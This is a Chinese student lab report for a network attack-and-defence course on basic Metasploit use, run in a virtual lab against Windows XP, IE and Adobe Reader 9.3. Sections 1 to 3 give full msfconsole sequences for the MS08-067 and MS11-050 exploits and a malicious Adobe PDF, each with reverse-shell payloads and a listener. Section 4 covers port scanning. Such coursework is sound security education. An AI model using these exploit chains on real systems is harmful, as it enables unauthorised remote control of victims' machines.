# 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用
基础问题回答
- 用自己的话解释什么是exploit,payload,encode
exploit
:使用者利用漏洞进行攻击的一个过程,是一个载具。payload
:攻击载荷,如后门等攻击代码。encode
:用来编码,用于伪装
实践过程记录
1.Windows服务渗透攻击——MS08-067安全漏洞
①攻击机:kali ②靶机:windows XP SP3(English)
可以ping通。
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf >
search ms08-067
//使用search命令搜寻有关漏洞MS08_067的相关信息
msf >
use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi)>
show payloads
//查看可以供我们使用的payload:
msf exploit(ms08_067_netapi)>
set payload generic/shell_reverse_tcp
//tcp反向回连msf exploit(ms08_067_netapi)>
set LHOST 192.168.72.131
攻击者ipmsf exploit(ms08_067_netapi)>
set LPORT 5319
msf exploit(ms08_067_netapi)>
set RHOST 192.168.72.135
//靶机ipmsf exploit(ms08_067_netapi)>
set target 0
//自动选择目标系统类型
msf exploit(ms08_067_netapi) >
exploit
成功!攻击结果如下:
2.浏览器渗透攻击——MS11-050
①攻击机:kali ②靶机:WindowsXP Professional sp2/Windows7专业版 ③IE版本:7.0/8.0
在攻击机kali输入msfconsole
进入控制台,依次输入以下指令:
msf >
use windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_cobjectelement) >
set payload windows/meterpreter/reverse_http
//http反向回连msf exploit(ms11_050_cobjectelement) >
set LHOST 192.168.72.131
//攻击机ipmsf exploit(ms11_050_cobjectelement) >
set LPORT 5319
//攻击端口固定msf exploit(ms11_050_cobjectelement) >
set URIPATH rhl19
//统一资源标识符路径设置msf exploit(ms11_050_cobjectelement) >
exploit
成功得到Local ip:
用靶机访问http://192.168.72.131:8080/rhl19 ,出现了弹窗警告:
尝试修改一下ie浏览器的相关设置,降低其安全等级
第二次在IE中访问以上网址还是失败了...很难受...
3.针对客户端的攻击Adobe
①攻击机:kali ②靶机:windowsXP Professional sp2 ③Adobe版本:9.3
在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf >
use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) >
set payload
windows/meterpreter/reverse_tcp //tcp反向回连msf exploit(adobe_cooltype_sing) >
set LHOST 192.168.72.131
//攻击机ipmsf exploit(adobe_cooltype_sing) >
set LPORT 5319
//攻击端口msf exploit(adobe_cooltype_sing) >
set FILENAME 20155319.pdf
//设置生成pdf文件的名字msf exploit(adobe_cooltype_sing) >
exploit
//攻击成功生成pdf。
由于生成的文件是隐藏文件使用copy命令把其复制到别的目录中去。
将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.72.131 //攻击机ip
msf exploit(handler) > set LPORT 5319 //攻击端口固定
msf exploit(handler) > exploit
- 再把靶机上打开pdf文件,回连成功。
4.Metasploit之——信息收集模块
一、扫描端口
- msf > use auxiliary/scanner/portscan/syn(使用portscan模块)
- msf auxiliary(syn) > show options
- msf auxiliary(syn) > set RHOSTS 192.168.72.137(目标)
- msf auxiliary(syn) > set THREADS 50(线程)
- msf auxiliary(syn) > exploit
由于扫描时间比较长,提前终止了。
二、扫描靶机的TCP端口使用情况
输入以下指令:
run开启扫描,可以看到在winxp靶机上所有tcp端口的使用情况
实践总结及体会
本次实验没有什么特别难的地方,主要在环境的配置上,自己配置了好久但还是不成功,最后拷了配置好的虚拟机。体会到了metasploit攻击漏洞的专一性,对操作系统和软件版本都有细致的要求。必须要在特定环境和特定触发条件下才能成功。感受到了实践和真实攻击的差距。
# 2017-2018-2 20155319『网络对抗技术』Exp5:MSF基础应用的更多相关文章
- 20165308『网络对抗技术』Exp5 MSF基础应用
20165308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
- 20155308『网络对抗技术』Exp5 MSF基础应用
20155308『网络对抗技术』Exp5 MSF基础应用 一.原理与实践说明 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实 ...
- # 2017-2018-2 20155319 『网络对抗技术』Exp8:Web基础
2017-2018-2 20155319 『网络对抗技术』Exp8:Web基础 一.原理与实践说明 1.实践具体要求 (1).Web前端HTML(0.5分) 能正常安装.启停Apache.理解HTML ...
- # 2017-2018-2 20155319『网络对抗技术』Exp7:网络欺诈防范
2017-2018-2 20155319『网络对抗技术』Exp7:网络欺诈防范 一.原理与实践说明 1.实践目标 本实践的目标是:理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法. 2. ...
- # 2017-2018-2 20155319『网络对抗技术』Exp6:信息收集与漏洞扫描
2017-2018-2 20155319『网络对抗技术』Exp6:信息收集与漏洞扫描 实践内容 (1)各种搜索技巧的应用 (2)DNS IP注册信息的查询 (3)基本的扫描技术:主机发现.端口扫描.O ...
- # 2017-2018-2 20155319『网络对抗技术』Exp4:恶意代码分析
2017-2018-2 20155319『网络对抗技术』Exp4:恶意代码分析 实验目标与基础问题 ++1.实践目标++ 监控你自己系统的运行状态,看有没有可疑的程序在运行. 分析一个恶意软件,就分析 ...
- # 2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践
2017-2018-2 20155319『网络对抗技术』Exp2:后门原理与实践 1.实验准备 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 (0.5分) 任务二:使用s ...
- 2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155327『网络对抗技术』Exp5:MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:使用者利用漏洞进行攻击 ...
- 2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用
2017-2018-2 20155303『网络对抗技术』Exp5:MSF基础应用 --------CONTENTS-------- 一.原理与实践说明 1.实践内容 2.预备知识 3.基础问题 二.实 ...
随机推荐
- 让你的app体验更丝滑的11种方法!冲击手机应用榜单Top3指日可待
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 本文由WeTest质量开放平台团队发表于云+社区专栏 一款app除了要有令人惊叹的功能和令人发指交互之外,在性能上也应该追求丝滑的要求,这样 ...
- CSS3动画详解(图文教程)
本文最初发表于博客园,并在GitHub上持续更新前端的系列文章.欢迎在GitHub上关注我,一起入门和进阶前端. 以下是正文. 前言 本文主要内容: 过渡:transition 2D 转换 trans ...
- 使用 PowerShell 创建 Azure VM 的自定义映像
自定义映像类似于应用商店映像,不同的是自定义映像的创建者是你自己. 自定义映像可用于启动配置,例如预加载应用程序.应用程序配置和其他 OS 配置. 在本教程中,你将创建自己的 Azure 虚拟机自定义 ...
- 使用TaskScheduler 调度器 实现跨线程的控件访问
//任务调度器 TaskScheduler UIscheduler = null; public Form1() { //获取任务调度器 UIscheduler = TaskScheduler.Fro ...
- SharePoint读取配置文件
配置文件存放目录 C:\inetpub\wwwroot\wss\VirtualDirectories\80\web.config 读取配置 string Name=Configuration.WebC ...
- 工作中遇到的问题收集--.NET
一.拒绝访问 temp 目录.用来运行 XmlSerializer 的标识“IIS APPPOOL\MZJYMIS”没有访问 temp 目录的足够权限.CodeDom 将使用进程正在使用的用户帐户进行 ...
- JS里设定延时
使用SetInterval和设定延时函数setTimeout 很类似.setTimeout 运用在延迟一段时间,再进行某项操作. setTimeout("function",tim ...
- Cisco ASA 使用ASDM 配置管理口 方法
CISCO ASA防火墙ASDM安装和配置 准备一条串口线一边接台式机或笔记本一边接防火墙的CONSOLE 接口,通过CRT或者超级终端连接ASA在用ASDM图形管理界面之前须在串口下输入一些命令开启 ...
- phpstorm添加laravle语法支持
PHPStorm神器可以支持更友好的laravel框架代码提示,只需要执行如下才做: 第一步:在项目的composer.json中添加如下一行 "require": { " ...
- SDN期末
一.项目描述 负载均衡程序 二.小组分工 组名:我们真的很弱 组员:李佳铭.吴森杰.张岚鑫.薛宇涛.杨凌澜 三.代码演示及过程描述 四.课程总结